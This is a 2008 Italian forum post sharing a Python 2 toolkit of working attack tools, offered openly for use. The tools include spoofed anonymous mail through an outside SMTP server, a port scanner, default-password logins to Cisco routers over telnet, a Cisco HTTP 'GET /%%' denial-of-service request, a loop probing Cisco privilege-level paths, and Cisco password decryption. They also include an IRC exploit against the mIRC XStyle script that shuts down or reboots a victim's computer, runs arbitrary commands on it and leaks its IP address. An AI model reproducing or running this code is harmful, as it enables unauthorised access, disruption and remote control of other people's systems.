Forum programmazione

^4st3r1X^ · by **^4st3r1X^** on Tue Jul 15, 2008 1:30 pm

Code: Select all: #!/usr/bin/python import time import socket import os from cisco_decrypt import CiscoPassword print """ ~~~~~~~~~~~~~~~~~~ ~~~ Tools 1.0 ~~ ~~~~~~~~~~~~~~~~~~ ~~ By ^4st3r1X^ ~~ ~~~~~~~~~~~~~~~~~~ 1) Anonymail 2) Portscan 3) Traceroute 4) Lookup 5) Attack cisco default passwords 6) Cisco exploit "GET /%%" 7) Cisco auth level exploit 8) Cisco password decrypt 9) mIRC-XStyle Remote shell CTCP """ if os.path.exists("Lab_1.0") == True: pass else: Lab = os.popen("mkdir ~/Lab_1.0") def anon(): print "\n~Anonimail~\n" ip = "smtp.nemesi.net" p = 25 nome = raw_input("Inserisci il nome: ") mittente = raw_input("Inserisci il mittente: ") destinatario = raw_input("Inserisci il destinario: ") oggetto = raw_input("Inserisci l'oggetto: ") messaggio = raw_input("Inserisci il messaggio: ") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, p)) time.sleep(1) s.send("helo %s\n" % (nome)) time.sleep(1) s.send("mail from:<%s>\n" % (mittente)) time.sleep(1) s.send("rcpt to:<%s>\n" % (destinatario)) time.sleep(1) s.send("data\n") time.sleep(1) s.send("from: %s <%s>\n" % (nome, mittente)) time.sleep(1) s.send("subject: %s\n" % (oggetto)) time.sleep(1) s.send("%s" % (messaggio)) time.sleep(1) s.send("\n.\n") time.sleep(1) data = s.recv(100000) if data.find("250") != -1: print "\nInviato\n" else: print "\nInvio fallito\n" except socket.error,msg: print "\nImpossibile connettersi\n" finally: s.close() exit() def cisco(): print "\n~Cisco hack password~\n" ip = raw_input("ip: ") p = 23 log = open('Lab_1.0/Cisco.log', 'a') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Connessione in corso: %s" % (ip) try: s.connect((ip, p)) print "Connessione riuscita\n" except socket.error,msg: print "Connessione rifiutata\n" s.close() exit() time.sleep(1) data = s.recv(100000) if data.find("Username:") != -1: print "Login in corso..." s.send("cisco\n") time.sleep(1) s.send("cisco\n") time.sleep(1) data = s.recv(100000) time.sleep(1) if data.find("% Login invalid") != -1: print "Login errato" exit() if data.find("% Bad passwords") != -1: print "Login errato" exit() else: print ">>Login riuscito" s.send("enable\n") time.sleep(1) log.write("%s Login riuscito\nuser:cisco\npass:cisco\n" % (ip)) print "Login come amministratore in corso..." s.send("cisco\n") time.sleep(1) data = s.recv(100000) time.sleep(1) if data.find("#") != -1: print ">>Login amministratore riuscito" log.write("%s Login admin riuscito\npass:cisco\n" % (ip)) else: print "Login admin fallito" exit() if data.find("Password:") != -1: print "Login in corso..." s.send("cisco\n") time.sleep(1) data = s.recv(100000) time.sleep(1) if data.find("% Login invalid") != -1: print "Login errato" exit() if data.find("% Bad passwords") != -1: print "Login errato" exit() if data.find("Password:") != -1: print "Login errato" exit() else: print ">>Login riuscito" s.send("enable\n") time.sleep(1) log.write("%s Login riuscito\npass:cisco\n" % (ip)) print "Login come amministratore in corso..." s.send("cisco\n") time.sleep(1) data = s.recv(100000) time.sleep(1) if data.find("#") != -1: print ">>Login amministratore riuscito" log.write("%s Login admin riuscito\npass:cisco\n" % (ip)) else: print "Login admin fallito" exit() else: print "Login errato" exit() def scan(): from time import strftime print "\n~Port scanner~\n" data = strftime("%d-%m-%Y %H:%M:%S") log = open('Lab_1.0/Scan.log', 'a') info = { 1:'TCP Multiplexor', 7: 'Echo', 20: 'FTP', 21: 'FTP', 22: 'SSH', 23: 'Telnet', 25: 'SMTP', 53: 'DNS', 67: 'BOOTP Server', 68: 'BOOTP Client', 69: 'TFTP', 70: 'Gopher', 79: 'Finger', 80: 'HTTP', 88: 'Kerebros', 110: 'POP-3', 113: 'Auth', 119: 'NNTP', 139: 'Netbios', 143: 'IMAP-4', 443: 'HTTPS', 445: 'Microsoft-DS', 465: 'SMTP', 631: 'Cups', 666: 'Doom game', 993: 'IMAP-4', 995: 'POP-3', 1011: 'Doly trojan', 1012: 'Doly trojan', 1080: 'Socks proxy', 1234: 'Netbus', 1337: 'Waste', 1353: 'IBM lotus', 1433:'SQL Server', 1434: 'SQL Monitor', 1521: 'Oracle', 2081: 'Cpanel', 2086: 'Web host manager', 3050: 'Firebird database system', 3128: 'HTTP Squid cache', 3306: 'MySQL database system', 3389: '(RDP) desktop remoto', 4590: 'ICQ trojan', 4662: 'eMule', 4672: 'eMule', 4711: 'eMule Web server', 5000: 'plug-and-play', 5060: 'SIP', 5190: 'AOL instant messenger', 5222: 'XMPP/Jabber Client Connection', 5223: 'XMPP/Jabber SSL', 5269: 'XMPP/Jabber Server Connection', 5432: 'PostgreSQL Database system', 5631: 'Symantec PcAnywhere', 5632: 'Symantec PcAnywhere', 5800: 'Ultra VNC (HTTP)', 5900: 'Ultra VNC (Main)', 6000: 'X-11', 6660: 'IRC', 6661: 'IRC', 6662: 'IRC', 6663: 'IRC', 6664: 'IRC', 6665: 'IRC', 6666: 'IRC', 6667: 'IRC', 6668: 'IRC', 6669: 'IRC', 6881: 'Bit torrent', 6969: 'Bit torrent', 8000: 'iRDMI', 8080: 'Proxy', 8118: 'Privoxy', 9009: 'Pichat', 9050: 'Tor', 12345: 'Netbus', 12346: 'Netbus', 27960: 'Quake 3', 31337: 'Back Orifice', 41951: 'TVersity Media Server', } ip = raw_input("Inserisci l'host: ") inizio = input("Inserisci la porta d'inzio scansione: ") fine = input("Inserisci la porta di fine scansione: ") print "\nInzio scansione dalla porta %s alla porta %s sull'host %s\n" % (inizio, fine, ip) log.write("%s - Inzio scansione dalla porta %s alla porta %s sull'host %s\n" % (data, inizio, fine, ip)) if fine < inizio: fine = inizio porte = [] for p in range(inizio, fine+1): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip,p)) porte.append(p) if len(porte) > 0: if p in info: print "Aperta la porta %s Info: %s" % (p, info[p]) log.write("Aperta la porta %s Info: %s\r" % (p, info[p])) else: print "Aperta la porta %s Info: Sconosciuta" % (p) log.write("Aperta la porta %s Info: Sconosciuta\r" % (p)) except socket.error,msg: pass finally: s.close() if not porte: print "\nNon ci sono porte aperte" log.write("Nessuna porta aperta\n") print "\nScansione terminata" log.write("Scansione terminata\n\n") exit() def lookup(): print "\n~Lookup hostname~\n" ip = raw_input("Inserisci l'hostname: ") data = os.popen("nslookup %s" % (ip)) print data.read() def tracer(): print "\n~Traceroute~\n" ip = raw_input("Inserisci l'hostname: ") print "Traceroute in corso" data = os.popen("traceroute %s" % (ip)) print "Resoconto:\n" print data.read() def cdecry(): print "\n~Cisco password decrypt~\n" Crack = CiscoPassword() Pass = raw_input("Inserisci la password criptata: ") Password = Crack.decrypt(Pass) if len(Password) > 0: print "Pass crackata:\nPassword: %s" % (Password) else: print "Pass non crackata\n" def ciscoh(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "\n~Cisco GET /%% HTTP/1.0 Exploit~\n" ip = raw_input("Ip cisco: ") p = 80 try: print "Connessione in corso" s.connect((ip, p)) print "Connesso" time.sleep(1) print "Invio pacchetto DoS in corso" s.send("GET /%% HTTP/1.0\n\r") s.send("\n") print "Pacchetto DoS inviato" except socket.error,msg: print "Connessione rifiutata" exit() data = s.recv(100) time.sleep(2) if data.find("401 Unauthorized") != -1: print "Exploit fallito\n" else: print "Exploit riuscito\n" def authcisco(): print "\n~Cisco http auth level DoS~\n" ip = raw_input("Ip cisco: ") p = 80 sp = "%20" for vuln in range(16, 100): exploit = "GET /level/%s/exec/show%sprivilege HTTP/1.0\n\r" % (vuln, sp) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,p)) print "Attacco in corso 'level %s'" % (vuln) s.send(exploit) s.send("\n\r") data = s.recv(1000) time.sleep(1) if data.find("/Current privilege level is/") != -1: print "Trovata vulnerabilita' su 'level %s'" % (vuln) else: print "Nessuna vulnerabilita' trovata su 'level %s'" % (vuln) except: print "Connessione rifiutata\n" exit() def xstyle(): import time print "\n~XStyle remote control CTCP~\n" serv = raw_input("Server irc (ip): ") p = 6667 ID = "XStyle" nome = "www.xstylescript.tk" nick = "XStyle243" scelta = input("1)Usa proxy\n2)Prosegui\n\nScelta: ") if scelta == 1: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) proxy = raw_input("Ip proxy: ") proxyp = input("Porta proxy: ") proxyus = raw_input("Username proxy: ") proxypas = raw_input("Password proxy: ") try: s.connect((proxy, proxyp)) s.send(proxyus +"\n") time.sleep(1) s.send(proxypas +"\n") time.sleep(2) s.send("telnet %s %s\r\n" % (serv, p)) time.sleep(2) s.send("nick %s\r\n" % (nick)) time.sleep(2) s.send("user %s %s %s : %s\r\n" % (ID, ID, ID, nome)) print "Connesso\n\n" vittima = raw_input("Inserisci il nick per l'exploit: ") if len(vittima) > 0: s.send("PRIVMSG %s :VERSION\n" % (vittima)) print "Attacco in corso\n" time.sleep(15) data = s.recv(10000) if data.find(">X< Style") != -1: print """Possibile vulnerabilita' trovata nel client del nick %s Cosa desideri fare? 1) Spegni computer 2) Riavvia computer 3) Disconnetti da irc 4) Cambia nick 5) Scopri ip 6) Inserisci comando""" % (vittima) scelta = input("Scelta: ") hck = "Attacco inviato\n" if scelta == 1: tim = input("Imposta timer: ") mesg = raw_input("Messaggio spegnimento: ") cmdsp = "PRIVMSG %s :VERSION | { .run shutdown -s -t %s -c ""%s"" | halt }\n" % (vittima, tim, mesg) s.send(cmdsp) print hck time.sleep(2) exit() elif scelta == 2: s.send("PRIVMSG %s :VERSION | { .run shutdown -r | halt }\n" % (vittima)) print hck time.sleep(1) exit() elif scelta == 3: qmsg = raw_input("Messaggio quit: ") s.send("PRIVMSG %s :VERSION | { .quit %s | halt }\n" % (vittima, qmsg)) print hck time.sleep(2) exit() elif scelta == 4: vnick = raw_input("Nuovo nick vittima: ") s.send("PRIVMSG %s :VERSION | { .nick %s | halt }\n" % (vittima, vnick)) print hck time.sleep(2) exit() elif scelta == 5: chk = "#XStyleHacked" s.send("JOIN %s\n" % (chk)) time.sleep(1) s.send("MODE %s +si\n" % (chk)) s.send("PRIVMSG %s :VERSION | { .msg %s IP: $ip | halt }\n" % (vittima, chk)) print hck time.sleep(2) print "Attendere..." time.sleep(13) data = s.recv(10000) if data.find("IP: ") != -1: print hck print "Sniffato pacchetto tcp contenente l'ip" print data exit() else: print "Attacco fallito" exit() elif scelta == 6: cmd = raw_input("Comando: ") s.send("PRIVMSG %s :VERSION | { .%s | halt }\n" % (vittima, cmd)) print hck time.sleep(1) exit() else: print "Scelta errata" exit() else: print "Impossibile eseguire l'attacco" exit() except socket.error,msg: print "Connessione fallita" exit() if scelta == 2: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((serv, p)) s.send("nick %s\n" % (nick)) s.send("user %s %s %s : %s\n" % (ID, ID, ID, nome)) print "Connesso\n\n" vittima = raw_input("Inserisci il nick per l'exploit: ") if len(vittima) > 0: s.send("PRIVMSG %s :VERSION\n" % (vittima)) print "Ricerca vulnerabilita' in corso...\n" time.sleep(25) data = s.recv(10000) if data.find(">X< Style") != -1: print """Possibile vulnerabilita' trovata nel client del nick %s Cosa desideri fare? 1) Spegni computer 2) Riavvia computer 3) Disconnetti da irc 4) Cambia nick 5) Scopri ip 6) Inserisci comando (windows)""" % (vittima) scelta = input("Scelta: ") hck = "Attacco inviato\n" if scelta == 1: tim = input("Imposta timer: ") mesg = raw_input("Messaggio spegnimento: ") cmdsp = "PRIVMSG %s :VERSION | { .run shutdown -s -t %s -c ""%s"" | halt }\n" % (vittima, tim, mesg) s.send(cmdsp) print hck time.sleep(3) exit() elif scelta == 2: s.send("PRIVMSG %s :VERSION | { .run shutdown -r | halt }\n" % (vittima)) print hck time.sleep(2) exit() elif scelta == 3: qmsg = raw_input("Messaggio quit: ") s.send("PRIVMSG %s :VERSION | { .quit %s | halt }\n" % (vittima, qmsg)) print hck time.sleep(1) exit() elif scelta == 4: vnick = raw_input("Nuovo nick vittima: ") s.send("PRIVMSG %s :VERSION | { .nick %s | halt }\n" % (vittima, vnick)) print hck time.sleep(2) exit() elif scelta == 5: chk = "#XStyleHacked" s.send("JOIN %s\n" % (chk)) time.sleep(1) s.send("MODE %s +si\n" % (chk)) s.send("PRIVMSG %s :VERSION | { .msg %s IP: $ip | halt }\n" % (vittima, chk)) print hck time.sleep(2) print "Attendere..." time.sleep(13) data = s.recv(10000) if data.find("IP: ") != -1: print "Attacco riuscito" print "Sniffato pacchetto tcp contenente l'ip" print data exit() else: print "Attacco fallito" exit() elif scelta == 6: cmd = raw_input("Comando: ") s.send("PRIVMSG %s :VERSION | { .%s | halt }\n" % (vittima, cmd)) print hck time.sleep(2) exit() else: print "Scelta errata" exit() else: print "Impossibile eseguire l'attacco" exit() else: print "Errore\n" exit() except socket.error,msg: print "Connessione fallita" exit() while True: try: dat = s.recv(1000) except socket.error,msg: print "Quit" exit() if dat.find ('PING') != -1: s.send('PONG ' + dat.split()[1] + '\r\n') scelta = input("Scelta: ") if scelta == 1: anon() elif scelta == 2: scan() elif scelta == 3: tracer() elif scelta == 4: lookup() elif scelta == 5: cisco() elif scelta == 6: ciscoh() elif scelta == 7: authcisco() elif scelta == 8: cdecry() elif scelta == 9: xstyle() else: print "Scelta errata" #by ^4st3r1X^

info:

1) Anonymail
2) Portscan
3) Traceroute
4) Lookup
5) Attack cisco default passwords
6) Cisco exploit "GET /%%"
7) Cisco auth level exploit
8) Cisco password decrypt
9) mIRC-XStyle Remote shell CTCP

**Sponsor**

Forum programmazione

python exploits e tools (by ^4st3r1X^)

python exploits e tools (by ^4st3r1X^)

python exploits e tools (by ^4st3r1X^)

Who is online